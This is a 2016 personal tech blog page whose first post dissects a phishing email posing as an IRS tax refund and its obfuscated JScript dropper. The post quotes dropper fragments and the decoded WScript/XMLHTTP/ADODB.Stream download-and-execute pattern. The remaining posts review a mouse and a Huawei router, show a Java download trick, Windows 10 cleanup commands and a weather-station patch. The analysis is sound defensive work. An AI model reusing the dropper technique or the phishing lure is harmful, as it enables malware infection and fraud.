Dissecting W32/Kavala Malware loader
Thursday, February 25. 2016
My honeypots draw in all kinds of waste. Lately I've been getting lot of "invoices", Russian Rolex resellers and ball bearing ads from China along with the usual crap. I keep combing trough all that muck in case there are hidden pearls among them. Today there was.
This was actually my 2nd encounter with Kavala (the joke here is: word "kavala" in Finnish means "treachreous" or "wily"). This treacherous thing lures in via e-mail in a .zip-file, then you have to be stupid enough to try to open it, at which point it will execute some JavaScript-code to download and install a very nasty piece of rootkit into your Windows-box. While part of the bot-net, your trusty PC will be spewing out spam to innocent people like me. Totally un-cool.
So, here goes the story from beginning. I got his e-mail from Ukraine:
Subject: New payment for tax refund #00803769
X-PHP-Originating-Script: 1000:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
Date: Thu, 25 Feb 2016 07:01:36 +0000
From: "Internal Revenue Service"
You are receiving this notification because your tax refund request has been processed.
Please download attached copy of the wire transfer confirmation from the bank.
Transaction type : Tax Refund
Payment method : Wire transfer
Amount : $ 3095.00
Status : Processed
Form : 15613C
Additional information regarding tax refunds can be found on our website:
http://www.irs.gov/Refunds.
Regards,
Internal Revenue Service
Address: 1111 Constitution Avenue, NW
Washington, DC 20224
Website: http://www.irs.gov
Phone: 1-800-829-1040
Last time it was from "American Airlines", my tickets were in the e-mail. See details of that scam here.
The interesting part of that "IRS" tax refund e-mail was the attachment. It was a .zip-file containing a single file named Tax_Refund.doc.js.
Contents of the JavaScript-file is a single line of code and when wrapped, it goes something like this:
var a23= '555D545E0C0B1710090517100116240E05160D4A1011160F0D0 E5E17505E55505152575C575C51505E55',h46='it',c72='azo ',f82='eval',p66=' {',b45='reat',r72='p://',k50='"AD ',g4='ject(',e26='ody',j62='1"',z95='; br',m55='WScr ws.',q27='Scr',b6='io',p64=' { fo',j20=' (',v81='+n+ d',q39='.XM',c11='d(',g44='atch ',n66='Scri',c71='xa ',t57=' xo',t53='&rnd',d44='m")',l45='rea',e59='o.op c60='n =',q43='er) {',q48='ans.c',w34='; };',l60='en ,i92='atus ',w5='te-',y40='ar i=',o45='== 2',z54='; i',r70='if',i47=' { ',g0='; x',h88='im',l11='); i',u var',y74='eObje',b14=' x',q72='a.pos',x82='=60',m7=' 'tring',x0='var d',j73='ject(',r33='re',u7='n, ',m87 '3; n',h41=' tr',g72=t9+'b = '+b69+n19+'ux-p'+p83+'c '.r'+h42+'antr'+q48+'om".s'+t46+'it'+l36+'"); v'+q25 r59+' fn ='+x83+y15+'dEnvi'+'ronm'+l60+i49+'s('+'"%' s70+'0010'+j62+m46+t57+' = '+m55+'pt.C'+'reat'+n50+j 'ri'+q82+r33+'ateOb'+g4+k50+k8+p24+l45+d44+z54+'va'+
That's completely obfuscated crap. When beautified, it's still obfuscated crap:
q99 = ',2);',
l48 = '3; n',
h41 = ' tr',
g72 = t9 + 'b = ' + b69 + n19 + 'ux-p' + p8
o36 + h88 + 'e.co' + c95 + c72 + 'lk.
'antr' + q48 + 'om".s' + t46 + 'it' +
' W' + q27 + g49 + b45 + y74 + v36 +
r59 + ' fn =' + x83 + y15 + 'dEnvi' +
'TEMP' + h24 + k16 + 'trin' + 'g.fro'
'0010' + j62 + m46 + t57 + ' = ' + m5
m7 + q39 + 'LHTT' + 'P"' + w46 + 'var
r33 + 'ateOb' + g4 + k50 + k8 + p24 +
'd = ' + m60 + 'or (v' + 'ar n=' + '1
'r (v' + y40 + j38 + '<b.l' + 'engt'
'; try' + p66 + b14 + e59 + s38 + '("
']+"' + '/cou' + 'nter/' + '?id="' +
'"+' + u7 + 'fals' + u88 + '; x' + 'o
i92 + o45 + '00) ' + '{ x' + p20 + 'p
' xa' + '.wr' + m87 + 'e(xo' + '.resp
'a.si' + w41 + '1000)' + t21 + u60 +
'0; xa' + '.sa' + s51 + 'File' + j29
u54 + 'ws.Ru' + 'n(fn' + v81 + 'exe'
g44 + n48 + b56 + '}; };' + ' xa' + '
r70 + ' (d' + c60 + '= 1) ' + '{ l' +
'} ' + 'cat' + 'ch' + j20 + q43 + ' }
new Function(f82 + '(g72)')();
The good parts are what f82 and g72 contain. This is the obvious:
f82 = 'eval'
So, g72 contains all the nicely concatenated code in a single line. When beautified, it starts with following lines:
var ws = WScript.CreateObject("WScript.Shell");
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
Rest of the code was simply utilizing the newly created objects to go HTTP GET a "GIF-file" and save it into %TEMP% as an .exe. Finally, the code just executed all of them.
What every developer notices instantly is, that you cannot expect to use WScript in your code, unless you're running Internet Explorer or Edge as your browser. Still, that just limits possible victims. Most likely to just those ones who don't understand not to open the attachment.
There were three innocent sites around the net where the payload was loaded. It got all of them to confirm. Now that I had all the moving parts, I went to F-Secure website to submit my findings. The address is: https://www.f-secure.com/en/web/labs_global/submit-a-sample
I gave all the details and soon enough, there was an e-mail in my inbox from them:
They analyzed my findings and added it to their malware fingerprint database. I checked their most recent threats-list, and yes! I made it. There it was:
Lot of nasty and wily stuff floating around in the net. Be careful out there!
Logitech MX Anywhere 2 - Best mouse ever?
Sunday, February 14. 2016
Normally I wouldn't bother posting about a mouse, but this time I felt I had to. My previous laptop mouse broke. It was attached to one of the machines I use on daily basis and I worked perefectly for years. I don't know why the old Logitech simply refused to function no more. I did every trick I knew, but still no avail. I guess some cheap capacitor run out of its life there. So I had to go purhcase a new one.
In gaming (I do lot of FPS games), there is no substitute for a wired connection. But on a just surfin' or chatting lazily in the IRC, a wireless mouse does the trick more conveniently.
For those readers who are "whaaat! mouse? why would I want to use a mouse! so 90s!": I simply don't want to plough my finger on a plastic surface for hour every day. Not only my fingertips won't like it, but I find it just stupid. I've tried doing it, but trackpads aren't my thing. In fact I typically disable them, as me and many other touch typists like to rest my wrists exactly there where you other people love ploughing trough to simulate mouse movement. When I do that, mouse cursor starts wandering around when I'm typing. Not cool. So, no trackpads, but a real mouse. Actually, a pointing stick wedged between G, H and B -keys will work for me, but for example Apple doesn't do those for me.
There really aren't too many known manufcaturers in the mouse market anymore. Razer is in gaming business, and I already said, I wasn't going for a game mouse this time. You can make a choice between Logitech or somebody else whose name you either don't know or cannot pronounce. Logitech would like to move away from mouse business, but they are such a big player and making profit there, so I guess they really cannot do any sudden changes.
For a everyday use, Logitech has soooo many different models out there. Literally dozens and dozens. To narrow down my choices, I went immediately to the top-shelf material. Once I saw a wired USB-mouse being sold with 7,- € in a store. I had to get it, just for giggles. 
It was as much of a 7 euro mouse you can imagine. The worst part is the ridicouls leds making the thing glowing like a chrismas tree. So, no more el-cheapo crap.
When I realized, that there actually exists a rechargeable mouse, I had to go for it. The press release even had superlatives like "Logitech Introduces its Most Advanced Portable Mouse". Ok, they're boasting the thing is good, so they kinda reeled me in. I had to check how advanced or how super the mouse is. The price is around 80,- €, which was in my budget.
It looks like this:
On the outside, it looks like your regular Logitech mouse. I wasn't that impressed with that.
This is the part, that locked down the sale:
It is your regular Micro-A USB connector. Very popular in today's USB-things.
When flipping the rodent over, there are couple of new things, I haven't seen earlier in mice:
There is your O/I switch, a connect-button when your mouse needs a hint, that it should try harder making the connection. My experience about that is, that it does absolutely nothing. Then there is the "darkfield" sensor, which should work on any surface. And finally the new thing: a selector button. Since this beast can do both Bluetooth and Logitech's own wireless signals, you can choose between 3 devices which this thing can control. Actually, I would love to use that feature, but in my daily usage I need to switch between computers fast. Fast, as in, not wanting to flip my mouse over and keep clicking a button to make a choice between the computer I want to start using. On another type of usage scenario, that may be useful.
The pico-sensor is pretty much the same we've seen for many years already:
As I said, you don't necessarily need to use that. The mouse has bi-functionality in it, your Bluetooth connection will do fine.
My experience about this thing is: Wow! Amazing!
Yes, it is that good. The accuracy is there, ergonomic is there, the new Darklight sensor does exellent job on my desk. The thing is so slippery at the bottom, I didn't want to use my mouse mat anymore. Obviously, on the minus side, the thing is so slippery at the bottom it will just slip over the edge of my laptop when carrying it from a room to another. (I guess couple of drops later it will stop functioning, just like my previous one did.) The scroll roll has dual functionality, with friction or frictionless, which is cool. We've seen that in many mice before this. In general, the implementation of this excellent plan is just there. The general look and feel is so good, I might even get a second one.
I went to the support site and got some software for OS X:
You get to see the 500 mAh Li-po charge state and change all kinds of settings. No frills, plain functionality there.
In conclusion: They get this right. It is the best mouse I've seen this far!
Huawei E5577 quick test
Saturday, February 13. 2016
I had a chance to see what an E5577 is about. I don't own this, so I didn't break it apart. A Huawei E5577 is your run-of-the-mill Android-based 4G/3G/2G to Wi-Fi router. It even looks like a cell phone:
Huawei E5577 Specifications
Threre are some specs:
- LTE Category 4 Mobile Hotspot
- Freqencies supported:
- LTE: 2600/ 1800/ 800 MHz
- DC-HSPA+/ HSPA+/ UMTS: 2100/ 900 MHz
- GSM/ GPRS/ EDGE: 1900/ 1800/ 900/ 850 MHz
- Maximum transfer rates supported (DL = download, UL = upload):
- 4G LTE:
DL: 150 Mbit/s
UL: 50 Mbit/s - 3G Dual Carrier:
DL: 42 Mbit/s
UL: 5,76 Mbit/s - 3G HSDPA:
DL: 14,4 Mbit/s
UL: 5,76 Mbit/s
- 4G LTE:
- Standard 6-pin SIM card interface
- Format: Mini SIM
- Display: 1.45'' TFT LCD
- Startup time: 5s
- Dimensions: 96.8 mm x 58.0 mm x 17.3 mm
- Weight: 110g
- Micro SD Card slot
- Support external antenna: TS9 external antenna
- WiFi IEEE 802.11b/g/n
- Up to 10 users
IMEI info @ imei.info has:
- Model: E5577CS-321
- Brand: HUAWEI
- IMEI: TAC: 867262 FAC: 02
On the outside
Enough specs, let's look at the thing a bit closer. On the front, there is a small LCD-screen and a power button. On the bottom edge, there are couple of connectors:
Charger is (per Chinese standard) an USB-connector. Micro-a to be specific. Under the flip-cover, there are two TS9-connectors for optional external antennas. Two, as LTE MIMO requires.
On the top side of the router, there is a button:
That button is used with power-button (when power is already on), to navigate the screen menu:
Doing an even remote usable UI with two buttons only is ... stupid? impossible? ... erhm... difficult. But the obvious benefit is, that you can do at least some settings and see some information without logging into the thing. For non-Finnish readers, the menu says: Back (Takaisin), Device information (Laitteen tiedot) and Wi-Fi bandwidth (Wi-Fi kaista).
Normally, the screen has following status information:
In the inside
When back cover is popped, the thing looks like this under the hood:
The battery-pack is taking most of the space there. That's smart to put a 3 Ah Li-po battery for maximal usage time. When the battery is lifted, all the good stuff is visible:
On the top right corner, right next to the 4 battery pins, there is the SD-card slot. On an initial glance, it looks a lot like 2nd SIM-slot, but as you can see, there are 8 pins in a nice row. So, that's for SD-card. Below the empty SD-card slot, there is the 6-pin SIM -slot. It is already populated, as I was studying a router, which as actively used.
Web UI
Admin-interface is a Huawei classic http://192.168.8.1/
Since the WPA-password was clearly visible on the status screen, and this router is very easy to install to your home. Sales clerk had installed the SIM-card in the store, and at home you just kick the power on, and plug in the charger. That's very much a fire-and-forget thing. On my first login, I was greeted by:
Yes, the Huawei admin / admin -pair was in use there. Since, this wasn't mine, I didn't go change the password. Also the admin-console is only accessible from LAN-side, so it isn't that much of a security hole there.
In the main screen, very little surprises to anybody who has seen an E5186:
This unit was customized for TeliaSonera Finland and it has 3 languages to choose from: English, Swedish and Finnish.
Some firmware details:
The network settings were also exactly like an E5186:
At this point I was pretty sure, that an E5577 is just a miniature E5186.
The device details are:
As you can see, there are plenty of options to go change. I just didn't present all of them here. Very little interesting stuff there.
AJAX API
Since E5186 has a very good AJAX interface for the GUI, and this is just a miniature version of it. This had to have the same:
I even ran some queries just to test it:
/api/device/signal:
<pci>96</pci>
<sc></sc>
<cell_id>36657366</cell_id>
<rsrq>-7dB</rsrq>
<rsrp>-108dBm</rsrp>
<rssi>-79dBm</rssi>
<sinr>2dB</sinr>
<rscp></rscp>
<ecio></ecio>
<mode>7</mode>
Everything I threw at it returned exactly similar results, than E5186. Which of course is a very good thing.
Final words
This was a very pleasant exploration to a familiar device. I have really nothing negative to say about this router.
As I just pulled this from my article-queue, I had a chance to do some follow-up with the owner. She said, that it had been performing well and no issues had been encountered.
Earlier last year I was playing around with a ZTE MF910, which is a exact competitor for Huawei E5577. The MF910 isn't a robust box on a long run. Occasionally it loses the 4G-connection and requires some Tender/Love/Care to kick it back on-line. On my tests, it was an ok piece of plastic, but obviously non-computer users don't want to mess aroud with their hardware, they just want it to work when needed. The ZTE's box won't deliver on that.
Given a E5577 and MF910, having exactly the same price and all, my choice would be the Huawei.
Oracle Java download from command line
Friday, February 12. 2016
As Linux system administrator every once in a while you need to install something requiring Java. Open-source guys tend to gear towards OpenJDK, the GPL-licensed version of java. Still, java developers tend to write a lot of crappy code requiring a specific version of run-time-engine. So, you're in a desperate need of Oracle's java.
Now the Oracle people are very keen on you accepting their license before you can get your hands on their precious, leaky, JRE. At the same time all you have in front of you is a Bash-prompt and you're itching to go for a:
wget http://download.oracle.com/otn-pub/java/jdk/8u74-b02/jre-8u74-linux-x64.rpm
Yes. Everybody has tried that. No avail. 
All you're going to get with that is a crappy HTML-page saying, that you haven't approved the license agreement and your request is unauthorized.
Darn!
But wait! There is a solution! All the Oracle is looking to see is a specific cookie oraclelicense set with a value accept-securebackup-cookie.
So, to leech the file into your box, you can do a:
wget --header='Cookie: oraclelicense=accept-securebackup-cookie' http://download.oracle.com/otn-pub/java/jdk/8u74-b02/jre-8u74-linux-x64.rpm
Ta daa! No you're rocking.
Apache mod_rewrite: Blocking unwated requests
Thursday, February 11. 2016
How to stop Windows 10 upgrade bullying
Sunday, February 7. 2016
The problem
Ok. Microsoft has amped up their "upgrade now" campaign to a ridiculous level.
First Microsoft Marketing chief Chris Capossela "warned" about Windows 7 being insecure. Warned in quotes because my initial reaction was: "Oh really!? Is it really possible, that a Windows can not be secure operating system."
While this machine is eligble for a free Win 10 upg, I just don't want to do that yet. I will upgrade eventually, but at the time I choose, not some ignorant corporate chose for me. So, Mr. Capossela explained that users who choose Windows 7 do so “at your own risk, at your own peril” and he revealed Microsoft has concerns about its future software and hardware compatibility, security and more.
Now the latest development is, that Windows 10 upg is a recommended update as they're now aggressively pushing Windows 10 upgrades. Meaning, that have to actively dodge it every time I'll upgrade this box of mine.
Further details about KB2952664 a Compatibility update for upgrading Windows 7 patch @ Softpedia article.
The information
The annoyance looks like this:
In the process list of the victim machine, there is a GWXUX.exe producing that. Actually there are other GWX-prefixed processes capturing your machine, but for the sake of this blog post I'm ignoring that crap.
Ages ago Microsoft release KB article ID 3080351, How to manage Windows 10 notification and upgrade options. It contains all kinds of useless information about modifying registry entries like HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade value ReservationsAllowed.
What the article doesn't mention is, that it also hijacks your disk space at C:\$Windows.~BT and C:\$Windows.~WS. I got a tip from an article and found 5 GiB of crap already loaded to my computer. I ran cmd.exe (with administrator credentials) to free up my SSD-space:
C:\Windows\system32>attrib -h "C:\$Windows.~BT"
C:\Windows\system32>attrib -h "C:\$Windows.~WS"
C:\Windows\system32>cd "C:\$Windows.~BT"
C:\$Windows.~BT>takeown /f . /R /D Y
C:\$Windows.~BT>icacls . /grant Administrators:(OI)(CI)F /T
C:\Windows\system32>cd "C:\$Windows.~WS"
C:\$Windows.~WS>takeown /f . /R /D Y
C:\$Windows.~WS>icacls . /grant Administrators:(OI)(CI)F /T
After doing all that, reading all the information, changing all the registry values and removing pre-loaded waste... It didn't work. What the article doesn't mention, that one of the GWX-processes runs in background and snoops those registry values and changes them back! Yes. You read it right. The fuckers go to your computer and make better choices for your registery. Their flawed reasoning is, that you obviously have to be some sort of moron not to go for their ultimate product right now, or preferably yesterday. And as you (the moron), the owner of your computer running a lesser "insecure" OS, need Microsoft's help to make better decisions.
OH, COME ON! Not cool.
I'm NOT upgrading to Windows 10 yet, because I (as in me) am in control here. Not Microsoft (as in them).
The solution
After spending countless hours and experiencing a number of setbacks, when the timers kicked on I stumbled into somebody having exactly the same problem as I do. He also had a solution for it. Here is the article Using GWX Control Panel to Permanently Remove the 'Get Windows 10' Icon.
GWX Control Panel looks like this:
With this application, no need to game of Whack-a-Mole anymore. The not wanted and not needed crap will just fly out with a click of a button. Example of getting rid of pre-loaded Windows 10 installation files:
Ultimately the cleaned up machine will report:
List of goodies include:
- Is 'Get Windows 10' icon app running? App not found
- Is 'Get Windows 10' icon app enabled? App not found
- Windows 10 Download folders found? No
Oh yes!
The application has an option to stay as a background process to keep monitoring, that evil Microsoft processes stay gone. I didn't test that, as just kicking all the crap out of my computer did the trick. Now I was back on the drivers' seat. Now I can decide when to do the upgrade.
Temperature measurement limits of La Crosse WS2357
Thursday, February 4. 2016
Guess what happens right before hell freezes over? Your weather station indicates dew point of 136 °C. Kinda funny.
Good thing that Weather Underground allows you to edit by removing data points. So, there are couple gaps in my graphs now:
The reson for this weird behaviour can be found from the spec:
OMG! The lower bound of outside temperature measurement is -29.9 °C. In Finland that can be reached occasionally.
Fortunately I'm using open source software, Open2300. With very little debugging I found the code:
double temperature_outdoor(WEATHERSTATION ws2300, int temperature_conv)
...
return ((((data[1] >> 4) * 10 + (data[1] & 0xF) +
(data[0] >> 4) / 10.0 + (data[0] & 0xF) / 100.0) - 30.0));
double dewpoint(WEATHERSTATION ws2300, int temperature_conv)
...
return ((((data[1] >> 4) * 10 + (data[1] & 0xF) +
(data[0] >> 4) / 10.0 + (data[0] & 0xF) / 100.0) - 30.0));
There is a formula to convert raw data read from RS-232 -line to celsius.
My patch to fix this is:
--- svn/rw2300.h 2015-01-19 23:42:17.728311172 +0200
+++ JaTu/rw2300.h 2016-02-04 23:58:45.675123710 +0200
@@ -24,6 +24,7 @@
#include <math.h>
#include <sys/types.h>
#include <sys/stat.h>
+#include <float.h>
#define MAXRETRIES 50
#define MAXWINDRETRIES 20
@@ -56,6 +57,8 @@
#define MAX_APRS_HOSTS 6
+#define TEMPERATURE_OVERFLOW FLT_MIN
+
typedef struct {
char name[50];
int port;
--- svn/wu2300.c 2015-01-19 23:42:16.619287028 +0200
+++ JaTu/wu2300.c 2016-01-18 10:13:21.252092414 +0200
@@ -53,15 +53,18 @@
/* READ TEMPERATURE OUTDOOR - deg F for Weather Underground */
-
- sprintf(tempstring, "&tempf=%.2f", temperature_outdoor(ws2300, FAHRENHEIT) );
- strcat(urlline, tempstring);
-
+ tempfloat = temperature_outdoor(ws2300, FAHRENHEIT);
+ if (tempfloat > TEMPERATURE_OVERFLOW) {
+ sprintf(tempstring, "&tempf=%.2f", tempfloat );
+ strcat(urlline, tempstring);
+ }
/* READ DEWPOINT - deg F for Weather Underground*/
-
- sprintf(tempstring, "&dewptf=%.2f", dewpoint(ws2300, FAHRENHEIT) );
- strcat(urlline, tempstring);
+ tempfloat = dewpoint(ws2300, FAHRENHEIT);
+ if (tempfloat > TEMPERATURE_OVERFLOW) {
+ sprintf(tempstring, "&dewptf=%.2f", tempfloat );
+ strcat(urlline, tempstring);
+ }
/* READ RELATIVE HUMIDITY OUTDOOR */
--- svn/fetch2300.c 2015-01-19 23:42:17.728311172 +0200
+++ JaTu/fetch2300.c 2016-01-18 10:09:46.762108076 +0200
@@ -35,7 +35,7 @@
char tendency[15];
char forecast[15];
struct config_type config;
- double tempfloat_min, tempfloat_max;
+ double tempfloat, tempfloat_min, tempfloat_max;
int tempint, tempint_min, tempint_max;
struct timestamp time_min, time_max;
time_t basictime;
@@ -63,7 +63,11 @@
/* READ TEMPERATURE OUTDOOR */
- sprintf(tempstring, "To %.1f\n", temperature_outdoor(ws2300, config.temperature_conv) );
+ tempfloat = temperature_outdoor(ws2300, config.temperature_conv);
+ if (tempfloat == TEMPERATURE_OVERFLOW)
+ sprintf(tempstring, "To OVR\n");
+ else
+ sprintf(tempstring, "To %.1f\n", tempfloat);
strcat(logline, tempstring);
temperature_outdoor_minmax(ws2300, config.temperature_conv, &tempfloat_min,
@@ -79,8 +83,11 @@
/* READ DEWPOINT */
-
- sprintf(tempstring, "DP %.1f\n", dewpoint(ws2300, config.temperature_conv) );
+ tempfloat = dewpoint(ws2300, config.temperature_conv);
+ if (tempfloat == TEMPERATURE_OVERFLOW)
+ sprintf(tempstring, "DP OVR\n");
+ else
+ sprintf(tempstring, "DP %.1f\n", tempfloat );
strcat(logline, tempstring);
dewpoint_minmax(ws2300, config.temperature_conv, &tempfloat_min,
There I introduce a hard-limit of TEMPERATURE_OVERFLOW and check if that has been reached. If yes, the invalid value is not sent to WUnderground.
I've contacted the author of Open2300 about this, but haven't received a response.
